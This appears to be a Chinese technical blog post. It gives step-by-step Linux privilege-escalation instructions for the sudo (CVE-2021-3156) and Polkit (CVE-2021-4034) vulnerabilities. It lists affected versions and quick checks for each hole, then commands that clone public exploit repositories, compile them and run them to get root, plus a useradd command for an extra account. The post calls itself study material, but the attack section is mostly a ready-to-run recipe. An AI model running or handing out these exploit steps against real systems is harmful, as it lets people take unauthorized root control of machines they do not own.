热门标签
热门文章
- 1Iceberg生产调优_iceberg bitmap
- 2RNN/LSTM循环神经网络讲解_relm神经网络
- 3CentOS 7 安装流程详细教程
- 41.序列比较算法(全局序列比对及局部序列比对的python实现)_全局比对函数和局部比对函数
- 5【RELM分类】基于鲁棒极限学习机RELM实现数据分类附matlab代码
- 62024全新校园跑腿外卖配送平台独立版校园社区系统网站源码+APP+小程序前端全套源码_新版校园跑腿外卖独立版+app+小程序前端
- 7Jmeter之Bean shell使用_jmeter beanshell parameters
- 8Python:pip从安装到升级_python -m ensurepip --upgrade
- 9python中torch包OSError: [WinError 126] 找不到指定的模块。 Error loading“路径“or one of its dependencies.解决方案_已经安装完torch,还是显示oserror: [winerror 126] 找不到指定的模块。 e
- 10MySQL和Navicat基础_select password('456'); navicat
当前位置: article > 正文
Linux提权--SUDO(CVE-2021-3156)&Polkit(CVE-2021-4034)_linux 2021提权
作者:盐析白兔 | 2024-08-19 01:34:35
赞
踩
linux 2021提权
免责声明:本文仅做技术学习与交流...
目录
SUDO(CVE-2021-3156)
another: SUDO权限配置不当.
影响版本
由系统的内核和发布版本等等决定...(版本符合基本就拿下)
sudo: 1.8.2 - 1.8.31p2
sudo: 1.9.0 - 1.9.5p1
sudo 命令 sudo --version
-判断:
1-sudo版本判断.
2-命令报错判断:
sudoedit -s / --报错则存在漏洞.
-利用:
- git clone https://github.com/blasty/CVE-2021-3156.git
- cd CVE-2021-3156
- make
- chmod a+x sudo-hax-me-a-sandwich
-
- uname -a #查看内核版本
- id
- #最后的参数自己选:
- ./sudo-hax-me-a-sandwich 1
- -->提权之后的会话就是root权限了
-
Polkit(CVE-2021-4034)
vulhub/polkit/CVE-2021-4034/README.zh-cn.md at master · vulhub/vulhub · GitHub
漏洞影响2009年5月至今的所有polkit版本.
由于polkit是系统预装工具,所有存在polkit的linux系统均受影响
如:CentOS、Ubuntu、Debian、Redhat、Fedora、Gentoo、Mageia等
-判断:
dpkg -l policykit-1
--有信息就是有.
-利用:
git clone https://github.com/berdav/CVE-2021-4034.git--没有git命令就自己上传.或wget命令
yum install git
- cd CVE-2021-4034/
-
- make
-
- ./cve-2021-4034
-
- id
---判断一下--发现没有--->上来就直接干
--上传--打开时用到的权限还是test的,所以就不要直接上传,用wget...
--运行之后没有结果就GG...
添加用户
useradd -d /home/test -m test声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/盐析白兔/article/detail/1000159
推荐阅读
相关标签
